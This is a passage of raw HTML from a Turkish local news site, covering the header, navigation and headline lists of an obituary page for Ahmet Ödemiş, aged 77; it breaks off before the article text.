
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Ahmet Ödemiş 77 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Ahmet Ödemiş 77 yaşında"> <meta property="og:description" content=""> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/02/ahmet_odemis_h65770_4da71.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Ahmet Ödemiş 77 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Ahmet Ödemiş 77 yaşında"> <meta name="twitter:description" content=""> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/02/ahmet_odemis_h65770_4da71.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/02/ahmet_odemis_h65770_4da71.jpg" /> <meta itemprop="headline" content="Ahmet Ödemiş 77 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/ahmet_odemis_h65770_4da71.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2020-02-20T09:20:32+02:00" /> <meta itemprop="dateModified" content="2020-02-20T10:51:29+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/02/ahmet_odemis_h65770_4da71.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="ca-pub-9060105052041849" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html" title="Nurhak’ta kadınlar peçiç turnuvasında yarıştı" >Nurhak’ta kadınlar peçiç turnuvasında yarıştı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/akdeniz-meyve-sinegi-eylem-plani-toplantisi-yapildi-h65767.html" title="Akdeniz meyve sineği eylem planı toplantısı yapıldı" >Akdeniz meyve sineği eylem planı toplantısı yapıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html" title="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet" >Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-iki-onemli-etwinning-projesi-h65765.html" title="Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi" >Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kadin-meclisinden-gelin-adaylarina-ceyiz-yardimi-h65764.html" title="Kadın Meclisi’nden Gelin Adaylarına Çeyiz Yardımı" >Kadın Meclisi’nden Gelin Adaylarına Çeyiz Yardımı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-aof-irtibat-burosu-tesekkuru-h65762.html" title="Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü" >Başkan Sungur’dan AÖF İrtibat Bürosu teşekkürü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-onemli-bir-egitim-hizmetine-daha-kavusuyoruz-h65761.html" title="Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”" >Kaymakam Demir: “Önemli bir eğitim hizmetine daha kavuşuyoruz”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/ekinozunde-yaban-hayvanlarina-yem-destegi-h65757.html" title="Ekinözü’nde yaban hayvanlarına yem desteği" >Ekinözü’nde yaban hayvanlarına yem desteği</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/pancar-ciftcisine-egitim-toplantisi-duzenlendi-h65756.html" title="Pancar çiftçisine eğitim toplantısı düzenlendi" >Pancar çiftçisine eğitim toplantısı düzenlendi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/tokinin-yapacagi-sosyal-konut-kurasi-22-nisanda-cekilecek-h65755.html" title="TOKİ’nin yapacağı sosyal konut kurası 22 Nisan’da çekilecek" >TOKİ’nin yapacağı sosyal konut kurası 22 Nisan’da çekilecek</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="5924617eb909d871bc489ced885016a4266f1683" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Ahmet Ödemiş 77 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html" title="Hasan Ünsal 71 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/hasan_unsal_71_yasinda_h65771_d2cfd.jpg" alt="Hasan Ünsal 71 yaşında" /> Hasan Ünsal 71 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html" title="Ahmet Ödemiş 77 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/ahmet_odemis_h65770_4da71.jpg" alt="Ahmet Ödemiş 77 yaşında" /> Ahmet Ödemiş 77 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fikriye-kilinc-h65769.html" title="Fikriye Kılınç"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/fikriye_kilinc_h65769_4b9e1.jpg" alt="Fikriye Kılınç" /> Fikriye Kılınç</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/adil-olker-41-yasinda-h65760.html" title="Adil Ölker 41 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/adil_olker_41_yasinda_h65760_13346.jpg" alt="Adil Ölker 41 yaşında" /> Adil Ölker 41 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html" title="Nurhak’ta kadınlar peçiç turnuvasında yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/nurhakta_kadinlar_pecic_turnuvasinda_yaristi_h65768_a89c0.jpg" alt="Nurhak’ta kadınlar peçiç turnuvasında yarıştı" /> Nurhak’ta kadınlar peçiç turnuvasında yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/akdeniz-meyve-sinegi-eylem-plani-toplantisi-yapildi-h65767.html" title="Akdeniz meyve sineği eylem planı toplantısı yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/akdeniz_meyve_sinegi_eylem_plani_toplantisi_yapildi_h65767_7b64c.jpg" alt="Akdeniz meyve sineği eylem planı toplantısı yapıldı" /> Akdeniz meyve sineği eylem planı toplantısı yapıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html" title="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistan_belediyesi_genclik_ve_spor_hizmetleri_mudurlugu_bokeye_emanet_h65766_9924b.jpg" alt="Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet" /> Elbistan Belediyesi Gençlik ve Spor Hizmetleri Müdürlüğü, Böke’ye emanet</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-iki-onemli-etwinning-projesi-h65765.html" title="Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/hoca_ahmet_yesevi_ilkokulundan_iki_onemli_etwinning_projesi_h65765_d102d.jpg" alt="Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi" /> Hoca Ahmet Yesevi İlkokulu’ndan iki önemli eTwinning projesi</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-malatya-dan-1-puanla-dondu-h65020.html" title="Elbistanspor, Malatya&#039;dan 1 puanla döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistanspor_malatya_dan_1_puanla_dondu_h65020_b3e85.jpg" alt="Elbistanspor, Malatya&#039;dan 1 puanla döndü" /> Elbistanspor, Malatya&#039;dan 1 puanla döndü</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img 